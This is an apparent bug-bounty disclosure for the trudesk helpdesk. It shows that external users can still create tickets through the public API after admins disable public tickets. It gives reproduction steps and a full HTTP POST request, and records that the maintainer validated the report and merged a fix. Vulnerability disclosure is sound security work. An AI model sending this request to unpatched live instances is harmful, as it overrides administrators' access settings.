Improper Privilege Management in polonel/trudesk


Reported on

Jun 15th 2021


external user can submit ticket even when its disabled


external user can submit ticket even when its disabled


1. First from admin account goto settings-->tickets and disallow Allow public tickets .
So, external user cant create ticket using url http://localhost:8118/newissue .

2. Now as a external user , sent bellow request which will create a public ticket

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0


So, despite of being disabled for public ticket creation , still user can create ticket


Chris Brame validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame confirmed that a fix has been merged on 17c2eb a year ago
Chris Brame has been awarded the fix bounty
to join this conversation